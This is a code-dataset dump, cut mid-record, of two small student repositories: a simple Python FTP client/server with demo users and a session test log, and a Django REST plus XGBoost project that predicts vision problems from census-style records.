"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 501, "license_type": "no_license", "max_line_length": 71, "num_lines": 27, "path": "/database/init_db.py", "repo_name": "liuxingrichu/simple-FTP", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport os\nimport sys\n\n\nBASE_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(BASE_PATH)\n\nfrom FTPServer import settings\n\n\nuser_list = ['Lucy|123', 'Tom|123456']\n\n\ndef main():\n if not os.path.exists(settings.db_path):\n os.makedirs(settings.db_path)\n with open(settings.file_path, 'w+') as f:\n for i in user_list:\n f.write(i)\n f.write('\\n')\n\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.26060420274734497, "alphanum_fraction": 0.31980469822883606, "avg_line_length": 32.773197174072266, "blob_id": "9dcf96493d4b845f6756641f2ed9f94eb94846ec", "content_id": "2d7e1870762af35ff79f50fdec583eef20483a82", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4347, "license_type": "no_license", "max_line_length": 70, "num_lines": 97, "path": "/test.md", "repo_name": "liuxingrichu/simple-FTP", "src_encoding": "GB18030", "text": "\n服务器测试数据:\n-------------------------------------------------------------------\n2017-02-13 22:25:16.992743 Lucy 登陆!\n2017-02-13 22:25:23.613122 Lucy 退出!\n2017-02-13 22:25:32.279617 127.0.0.1 断开连接!\n2017-02-13 22:25:55.120924 Tom 登陆!\n2017-02-13 22:26:05.040491 Tom 异常退出!\n======================================================================\n\n客户端测试数据:\n\n-------------------------------FTP客户端------------------------------\n【1】登录 【2】上传文件 【3】下载文件 【4】查看文件列表 【5】退出\n---------------------------------end----------------------------------\n>>1\nEnter username : Lucy\nEnter password :123\n\t欢迎Lucy登陆\n-------------------------------FTP客户端------------------------------\n【1】登录 【2】上传文件 【3】下载文件 【4】查看文件列表 【5】退出\n---------------------------------end----------------------------------\n>>2\n\t请输入上传文件名称,例如test.txt\nEnter upload file name : test2.txt\n\t文件上传成功!\n-------------------------------FTP客户端------------------------------\n【1】登录 【2】上传文件 【3】下载文件 【4】查看文件列表 【5】退出\n---------------------------------end----------------------------------\n>>2\n\t请输入上传文件名称,例如test.txt\nEnter upload file name : test4.txt\n\t文件不存在\n-------------------------------FTP客户端------------------------------\n【1】登录 【2】上传文件 【3】下载文件 【4】查看文件列表 【5】退出\n---------------------------------end----------------------------------\n>>3\n\t请输入下载文件名称,例如test.txt\nEnter download file name : test1.txt\n\t文件下载成功!\n-------------------------------FTP客户端------------------------------\n【1】登录 【2】上传文件 【3】下载文件 【4】查看文件列表 【5】退出\n---------------------------------end----------------------------------\n>>4\n-------------文件列表-------------\ntest1.txt\ntest2.txt\ntest3.txt\n---------------end---------------\n-------------------------------FTP客户端------------------------------\n【1】登录 【2】上传文件 【3】下载文件 【4】查看文件列表 【5】退出\n---------------------------------end----------------------------------\n>>5\n\nProcess finished with exit code 0\n\n-------------------------------FTP客户端------------------------------\n【1】登录 【2】上传文件 【3】下载文件 【4】查看文件列表 【5】退出\n---------------------------------end----------------------------------\n>>1\nEnter username : Tom\nEnter password :123456\n\t欢迎Tom登陆\n-------------------------------FTP客户端------------------------------\n【1】登录 【2】上传文件 【3】下载文件 【4】查看文件列表 【5】退出\n---------------------------------end----------------------------------\n>>2\n\t请输入上传文件名称,例如test.txt\nEnter upload file name : test1.txt\n\t文件上传成功!\n-------------------------------FTP客户端------------------------------\n【1】登录 【2】上传文件 【3】下载文件 【4】查看文件列表 【5】退出\n---------------------------------end----------------------------------\n>>2\n\t请输入上传文件名称,例如test.txt\nEnter upload file name : test2.txt\n\t文件上传成功!\n-------------------------------FTP客户端------------------------------\n【1】登录 【2】上传文件 【3】下载文件 【4】查看文件列表 【5】退出\n---------------------------------end----------------------------------\n>>3\n\t请输入下载文件名称,例如test.txt\nEnter download file name : test1.txt\n\t文件下载成功!\n-------------------------------FTP客户端------------------------------\n【1】登录 【2】上传文件 【3】下载文件 【4】查看文件列表 【5】退出\n---------------------------------end----------------------------------\n>>4\n-------------文件列表-------------\ntest1.txt\ntest2.txt\n---------------end---------------\n-------------------------------FTP客户端------------------------------\n【1】登录 【2】上传文件 【3】下载文件 【4】查看文件列表 【5】退出\n---------------------------------end----------------------------------\n>>5\n\nProcess finished with exit code 0\n" } ]
7
arun32401/MachineLearningGenesysIWC
https://github.com/arun32401/MachineLearningGenesysIWC
408b62a0f3415899aa5776a1e916a821e9a57805
81a2b7d14f0271733954da75d8be9cc8d735b598
594bcbcd56f8030c4f0285edf4b0a796c6437a7f
refs/heads/master
2020-09-10T03:00:41.978619
2019-11-21T08:42:12
2019-11-21T08:42:12
221,632,286
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7046070694923401, "alphanum_fraction": 0.7046070694923401, "avg_line_length": 31.363636016845703, "blob_id": "95f65de80b19f076491d895f2ff84144ee1610b4", "content_id": "134fef16e0d50bef4969b8a60636445cea385a01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 369, "license_type": "no_license", "max_line_length": 53, "num_lines": 11, "path": "/ElderlyProject/oldperson/admin.py", "repo_name": "arun32401/MachineLearningGenesysIWC", "src_encoding": "UTF-8", "text": "from django.contrib import admin\r\nfrom oldperson.models import Oldperson\r\nfrom django.contrib.admin.options import ModelAdmin\r\n# Register your models here.\r\n\r\nclass OldpersonAdmin(ModelAdmin):\r\n list_display =[\"SERIALNO\", \"PUMA\", \"ST\", \"PWGTP\"]\r\n# search_fields = [\"SERIALNO\"]\r\n# list_filter=[\"ST\"]\r\n# \r\nadmin.site.register(Oldperson, OldpersonAdmin)\r\n\r\n" }, { "alpha_fraction": 0.6037735939025879, "alphanum_fraction": 0.7654986381530762, "avg_line_length": 30, "blob_id": "0759eee3bcd064e7ccc67187a55c67e344d2794c", "content_id": "9d56ccab49b60aeabaed2f8079b9ee9031a2450c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 371, "license_type": "no_license", "max_line_length": 53, "num_lines": 12, "path": "/frontend/src/config/firebase.js", "repo_name": "arun32401/MachineLearningGenesysIWC", "src_encoding": "UTF-8", "text": "const firebaseConfig = {\n\tapiKey: \"AIzaSyCw2rwJPbed3PNxF7vEPYNMRhxaLeRkjMM\",\n\tauthDomain: \"chatapp-80670.firebaseapp.com\",\n\tdatabaseURL: \"https://chatapp-80670.firebaseio.com\",\n\tprojectId: \"chatapp-80670\",\n\tstorageBucket: \"chatapp-80670.appspot.com\",\n\tmessagingSenderId: \"282698313573\",\n\tappId: \"1:282698313573:web:18d315f46f2a2e17ae7b8c\",\n\tmeasurementId: \"G-PZPF13YWTQ\"\n};\n\nexport default firebaseConfig;" }, { "alpha_fraction": 0.6426116824150085, "alphanum_fraction": 0.6632302403450012, "avg_line_length": 21.08333396911621, "blob_id": "b8b39af9c0c2ac79cf17208205a170d88ce9397c", "content_id": "b53a1bec72704a11835453886e4257cba052fc99", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 291, "license_type": "no_license", "max_line_length": 66, "num_lines": 12, "path": "/ElderlyProject/oldperson/myserializer.py", "repo_name": "arun32401/MachineLearningGenesysIWC", "src_encoding": "UTF-8", "text": "'''\r\nCreated on 06-Nov-2019\r\n\r\n@author: achauhan\r\n'''\r\nfrom oldperson.models import Oldperson\r\nfrom rest_framework import serializers\r\n\r\nclass OldpersonSerializer(serializers.HyperlinkedModelSerializer):\r\n class Meta:\r\n model = Oldperson\r\n fields = \"__all__\"\r\n \r\n " }, { "alpha_fraction": 0.4905933439731598, "alphanum_fraction": 0.515195369720459, "avg_line_length": 26.79166603088379, "blob_id": "78e0aa2783f71dbdaf8b8494593400541219f05b", "content_id": "8a4168b3ec1e344edd41bf01375030f3198939ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 691, "license_type": "no_license", "max_line_length": 114, "num_lines": 24, "path": "/ElderlyProject/disabledperson/migrations/0001_initial.py", "repo_name": "arun32401/MachineLearningGenesysIWC", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.7 on 2019-11-13 09:59\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n initial = True\r\n\r\n dependencies = [\r\n ]\r\n\r\n operations = [\r\n migrations.CreateModel(\r\n name='Disabledperson',\r\n fields=[\r\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\r\n ('PUMA', models.IntegerField()),\r\n ('ST', models.IntegerField()),\r\n ('AGEP', models.IntegerField()),\r\n ('SEX', models.IntegerField(choices=[('MALE', '1'), ('FEMALE', '2')])),\r\n ],\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.75, "avg_line_length": 19.600000381469727, "blob_id": "7759f10205fa1b4b7ecfb70e9051d322a5f263df", "content_id": "a2dca8ff5516a385b3968e4179d3fc90d79bb7a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 108, "license_type": "no_license", "max_line_length": 38, "num_lines": 5, "path": "/ElderlyProject/disabledperson/apps.py", "repo_name": "arun32401/MachineLearningGenesysIWC", "src_encoding": "UTF-8", "text": "from django.apps import AppConfig\r\n\r\n\r\nclass DisabledpersonConfig(AppConfig):\r\n name = 'disabledperson'\r\n" }, { "alpha_fraction": 0.5266666412353516, "alphanum_fraction": 0.5311111211776733, "avg_line_length": 26.125, "blob_id": "af8c72b967cc97f842f54ce3e991a52c09a2b60d", "content_id": "c45ca6c81cae5eaa07ede922325bd54cd62ec215", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 450, "license_type": "no_license", "max_line_length": 72, "num_lines": 16, "path": "/ElderlyProject/disabledperson/models.py", "repo_name": "arun32401/MachineLearningGenesysIWC", "src_encoding": "UTF-8", "text": "from django.db import models\r\n\r\n# Create your models here.\r\nclass Disabledperson(models.Model):\r\n PUMA = models.IntegerField()\r\n ST = models.IntegerField()\r\n AGEP = models.IntegerField()\r\n SEX = models.IntegerField(choices = ((\"1\", \"MALE\"),(\"2\", \"FEMALE\")))\r\n \r\n def to_dict(self):\r\n return{\r\n 'PUMA':self.PUMA,\r\n 'ST':self.ST,\r\n 'AGEP':self.AGEP,\r\n 'SEX':self.SEX\r\n }\r\n" }, { "alpha_fraction": 0.6655948758125305, "alphanum_fraction": 0.6848874688148499, "avg_line_length": 22.75, "blob_id": "6e179fd2f063d208de9d1dcbb4bc5cb9a77b3f79", "content_id": "f50e02b292101cf04c8db4d77f1c67968ff49254", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 311, "license_type": "no_license", "max_line_length": 71, "num_lines": 12, "path": "/ElderlyProject/disabledperson/myserializer.py", "repo_name": "arun32401/MachineLearningGenesysIWC", "src_encoding": "UTF-8", "text": "'''\r\nCreated on 06-Nov-2019\r\n\r\n@author: achauhan\r\n'''\r\nfrom disabledperson.models import Disabledperson\r\nfrom rest_framework import serializers\r\n\r\nclass DisabledpersonSerializer(serializers.HyperlinkedModelSerializer):\r\n class Meta:\r\n model = Disabledperson\r\n fields = \"__all__\"\r\n \r\n " }, { "alpha_fraction": 0.6361256837844849, "alphanum_fraction": 0.6832460761070251, "avg_line_length": 36, "blob_id": "87375bad3f3ab94ea3a2077d5cb650fd7dfd770d", "content_id": "4eb362317613c6eb69e3f3168f103f201ad1e080", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 382, "license_type": "no_license", "max_line_length": 49, "num_lines": 10, "path": "/ElderlyProject/oldperson/models.py", "repo_name": "arun32401/MachineLearningGenesysIWC", "src_encoding": "UTF-8", "text": "from django.db import models\r\n\r\n# Create your models here.\r\nclass Oldperson(models.Model):\r\n SERIALNO = models.CharField(max_length = 100)\r\n SPORDER = models.CharField(max_length = 100)\r\n PUMA = models.CharField(max_length = 100)\r\n ST = models.CharField(max_length = 100)\r\n PWGTP = models.CharField(max_length = 100)\r\n AGEP = models.CharField(max_length = 100)\r\n\r\n" }, { "alpha_fraction": 0.6781193614006042, "alphanum_fraction": 0.6889692544937134, "avg_line_length": 23.136363983154297, "blob_id": "4b42ed73b13c9ddafe8a7bb93dc269cb24905da1", "content_id": "582a3f7c51743dcf28737fefc51b9ec011185d1e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 553, "license_type": "no_license", "max_line_length": 63, "num_lines": 22, "path": "/ElderlyProject/disabledperson/urls.py", "repo_name": "arun32401/MachineLearningGenesysIWC", "src_encoding": "UTF-8", "text": "'''\r\nCreated on 06-Nov-2019\r\n\r\n@author: achauhan\r\n'''\r\n\r\nfrom django.urls import path\r\nfrom disabledperson import views\r\nfrom django.views.generic.base import RedirectView\r\nfrom rest_framework import routers\r\nfrom django.urls.conf import include\r\n\r\n\r\nrouter = routers.DefaultRouter()\r\nrouter.register(r'disabledperson', views.DisabledpersonViewSet)\r\n\r\nurlpatterns = [\r\n# path('home/', views.home),\r\n path(r'api/', include(router.urls)),\r\n# path('', RedirectView.as_view(url = \"home/\")),\r\n path('', RedirectView.as_view(url = \"api/\")),\r\n]\r\n" }, { "alpha_fraction": 0.6105263233184814, "alphanum_fraction": 0.6175438761711121, "avg_line_length": 21.30555534362793, "blob_id": "32fe2d3ecf7f13cb219ca3859083193a179d2811", "content_id": "c392059783f243253ba64f688f71e54f61a7b551", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 855, "license_type": "no_license", "max_line_length": 49, "num_lines": 36, "path": "/ElderlyProject/oldperson/oldPersonML2.py", "repo_name": "arun32401/MachineLearningGenesysIWC", "src_encoding": "UTF-8", "text": "'''\r\nCreated on 06-Nov-2019\r\n\r\n@author: achauhan\r\n'''\r\nimport pandas as pd\r\nimport numpy as np\r\n# from sklearn.metrics import train_test_split\r\nfrom xgboost import XGBClassifier\r\nfrom unittest.mock import inplace\r\nfrom pyexpat import model\r\n# from sklearn.metrics import accuracy_score\r\n# from sklearn.metrics import confusion_matrix\r\n\r\n\r\ndef pre_process(df):\r\n df = pd.read_excel(\"MLTest.xlsx\")\r\n print(df.head())\r\n print(df.describe())\r\n \r\n \r\ndef training():\r\n df = pd.read_excel(\"MLTest.xlsx\")\r\n df = pre_process(df)\r\n y = df[\"DEYE\"]\r\n df.drop(\"DEYE\", axis=\"columns\", inplace=True)\r\n x = df\r\n model = XGBClassifier()\r\n# x_train, x_test, y_train, y_test = tra\r\n model.fit(x,y)\r\n print(model.score(x,y))\r\n yp = model.predict(x)\r\n# cm=confusion_matrix(y, yp)\r\n \r\ndef pred():\r\n pass\r\n \r\n \r\n " }, { "alpha_fraction": 0.7670454382896423, "alphanum_fraction": 0.7670454382896423, "avg_line_length": 30, "blob_id": "714e5f66378a9f5cf57f021519c4cdf6be56c1fd", "content_id": "c2c1ff0d95de50a36d24732174a5f6c822323ec5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 352, "license_type": "no_license", "max_line_length": 54, "num_lines": 11, "path": "/ElderlyProject/oldperson/views.py", "repo_name": "arun32401/MachineLearningGenesysIWC", "src_encoding": "UTF-8", "text": "from rest_framework import viewsets\r\nfrom oldperson.models import Oldperson\r\nfrom oldperson.myserializer import OldpersonSerializer\r\n\r\n# Create your views here.\r\n# def home(req):\r\n# return HttpResponse(\"Hi Arun\")\r\n\r\nclass OldpersonViewSet(viewsets.ModelViewSet):\r\n queryset = Oldperson.objects.all()\r\n serializer_class = OldpersonSerializer\r\n" }, { "alpha_fraction": 0.7264367938041687, "alphanum_fraction": 0.7264367938041687, "avg_line_length": 31.615385055541992, "blob_id": "08775f2a160007b9b19458360b8b0868bb7796fc", "content_id": "d26e970daac92d72388d2a42cb688df8a7629862", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 435, "license_type": "no_license", "max_line_length": 56, "num_lines": 13, "path": "/ElderlyProject/disabledperson/admin.py", "repo_name": "arun32401/MachineLearningGenesysIWC", "src_encoding": "UTF-8", "text": "from django.contrib import admin\r\nfrom disabledperson.models import Disabledperson\r\nfrom django.contrib.admin.options import ModelAdmin\r\n\r\n# Register your models here.\r\nclass DisabledpersonAdmin(ModelAdmin):\r\n list_display =[\"ST\", \"PUMA\", \"AGEP\"]\r\n# search_fields = [\"PUMA\"]\r\n list_filter=[\"ST\"]\r\n list_filter=[\"SEX\"]\r\n# \r\nadmin.site.register(Disabledperson, DisabledpersonAdmin)\r\n# admin.site.register(Disabledperson)" }, { "alpha_fraction": 0.7542135119438171, "alphanum_fraction": 0.7542135119438171, "avg_line_length": 45.46666717529297, "blob_id": "a461160ba7ef88264f43e3e46e5e330b7342c75c", "content_id": "7c545a99dbb1004f19605ef9ee3f0993bbf98367", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 712, "license_type": "no_license", "max_line_length": 100, "num_lines": 15, "path": "/ElderlyProject/disabledperson/views.py", "repo_name": "arun32401/MachineLearningGenesysIWC", "src_encoding": "UTF-8", "text": "from rest_framework import viewsets\r\nfrom disabledperson.models import Disabledperson\r\nfrom disabledperson.myserializer import DisabledpersonSerializer\r\nfrom disabledperson import disabledpersonML\r\nfrom rest_framework.response import Response\r\n\r\n\r\nclass DisabledpersonViewSet(viewsets.ModelViewSet):\r\n queryset = Disabledperson.objects.all()\r\n serializer_class = DisabledpersonSerializer\r\n def create(self, request, *args, **kwargs):\r\n viewsets.ModelViewSet.create(self, request, *args, **kwargs)\r\n ob = Disabledperson.objects.last()\r\n vision_problem = disabledpersonML.pred(ob)\r\n return Response({\"Status\": \"Vision Problem\", \"Vision problem\": vision_problem, 'temp':args})\r\n" }, { "alpha_fraction": 0.5216768383979797, "alphanum_fraction": 0.5335005521774292, "avg_line_length": 32.48147964477539, "blob_id": "1d4a5977d0fb6125b8b55bfab834eb37e5a107a8", "content_id": "23e76ce9b9684ae04caa61a846350942d806c9cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2791, "license_type": "no_license", "max_line_length": 128, "num_lines": 81, "path": "/ElderlyProject/disabledperson/disabledpersonML.py", "repo_name": "arun32401/MachineLearningGenesysIWC", "src_encoding": "UTF-8", "text": "'''\r\nCreated on 06-Nov-2019\r\n\r\n@author: achauhan\r\n'''\r\nimport pandas as pd\r\nimport numpy as np\r\n# from sklearn.metrics import train_test_split\r\nfrom xgboost import XGBClassifier\r\nfrom unittest.mock import inplace\r\nfrom pyexpat import model\r\nfrom _ast import Try, With\r\nfrom copyreg import pickle\r\nimport pickle\r\nimport os\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.metrics import confusion_matrix\r\n\r\n\r\ndef pre_process(df):\r\n print(\"--------------------------Inside pre process ----------------------------------------\")\r\n# print(df.head())\r\n# print(df.describe())\r\n# print(df.info())\r\n return df\r\n \r\ndef training(df):\r\n df = pre_process(df)\r\n y_parameter = df['DEYE']\r\n df.drop(\"DEYE\", axis=\"columns\", inplace=True)\r\n x = df\r\n dummyRow = pd.DataFrame(np.zeros(len(x.columns)).reshape(1, len(x.columns)), columns = x.columns)\r\n dummyRow.to_csv(\"dummyRow.csv\", index=False)\r\n \r\n model = XGBClassifier(n_estimators=10, max_depth=4, min_child_weight=9, objective = 'binary:logistic', scale_pos_weight= .9)\r\n model.fit(x,y_parameter)\r\n pkl_filename = \"pickle_model.pkl\"\r\n with open(pkl_filename, 'wb') as file:\r\n pickle.dump(model, file)\r\n \r\n print(\"--------------------------training Score: ----------------------------------------\")\r\n print(model.score(x,y_parameter))\r\n yp = model.predict(x)\r\n cm=confusion_matrix(y_parameter, yp)\r\n print(\"--------------------------Confussion matrix: ----------------------------------------\")\r\n print(cm)\r\n \r\ndef pred(ob):\r\n print(\"--------------------------Inside predict method----------------------------------------\")\r\n d1=ob.to_dict()\r\n df = pd.DataFrame(d1, index=[0])\r\n # df.drop(\"DEYE\", axis=\"columns\", inplace=True)\r\n df = pre_process(df)\r\n dummrrow_filename = \"./dummyRow.csv\"\r\n dummrrow_filename= os.path.dirname(__file__)+\"/\"+dummrrow_filename\r\n df2 = pd.read_csv(dummrrow_filename)\r\n for c1 in df.columns:\r\n df2[c1]= df[c1]\r\n pkl_filename = \"pickle_model.pkl\" \r\n pkl_filename= os.path.dirname(__file__)+\"/\"+pkl_filename \r\n with open(pkl_filename, 'rb') as file:\r\n model = pickle.load(file)\r\n print(df2)\r\n df2 = df2.astype(convert_dict)\r\n pred = model.predict(df2) \r\n return pred \r\n\r\nconvert_dict = {'PUMA': int, \r\n 'ST': int,\r\n 'AGEP': int,\r\n 'SEX': int\r\n }\r\n \r\nif __name__ ==\"__main__\":\r\n print(\"--------------------------Inside main method ----------------------------------------\")\r\n# df = pd.read_excel(\"MLTest2.xlsx\")\r\n# df = pd.read_excel(\"ss13pusa.xlsx\")\r\n df1 = pd.read_csv(\"Data1.csv\")\r\n df2 = pd.read_csv(\"Data2.csv\")\r\n df_all_rows = pd.concat([df1, df2])\r\n training(df_all_rows)" }, { "alpha_fraction": 0.7244898080825806, "alphanum_fraction": 0.7244898080825806, "avg_line_length": 17.600000381469727, "blob_id": "7f25646d01defad1c8dc619d51b76da50984e2ee", "content_id": "60e563969ebc4e5d105a28826cd3b05a25ebbd30", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 98, "license_type": "no_license", "max_line_length": 33, "num_lines": 5, "path": "/ElderlyProject/oldperson/apps.py", "repo_name": "arun32401/MachineLearningGenesysIWC", "src_encoding": "UTF-8", "text": "from django.apps import AppConfig\r\n\r\n\r\nclass OldpersonConfig(AppConfig):\r\n name = 'oldperson'\r\n" }, { "alpha_fraction": 0.49451887607574463, "alphanum_fraction": 0.5347137451171875, "avg_line_length": 29.576923370361328, "blob_id": "5855a5feb52a5806df082033172095af3fd5d8f4", "content_id": "669a31773434900c2d76662d1a5faec45fdb15b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 821, "license_type": "no_license", "max_line_length": 114, "num_lines": 26, "path": "/ElderlyProject/oldperson/migrations/0001_initial.py", "repo_name": "arun32401/MachineLearningGenesysIWC", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.7 on 2019-11-07 12:56\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n initial = True\r\n\r\n dependencies = [\r\n ]\r\n\r\n operations = [\r\n migrations.CreateModel(\r\n name='Oldperson',\r\n fields=[\r\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\r\n ('SERIALNO', models.CharField(max_length=100)),\r\n ('SPORDER', models.CharField(max_length=100)),\r\n ('PUMA', models.CharField(max_length=100)),\r\n ('ST', models.CharField(max_length=100)),\r\n ('PWGTP', models.CharField(max_length=100)),\r\n ('AGEP', models.CharField(max_length=100)),\r\n ],\r\n ),\r\n ]\r\n" } ]
16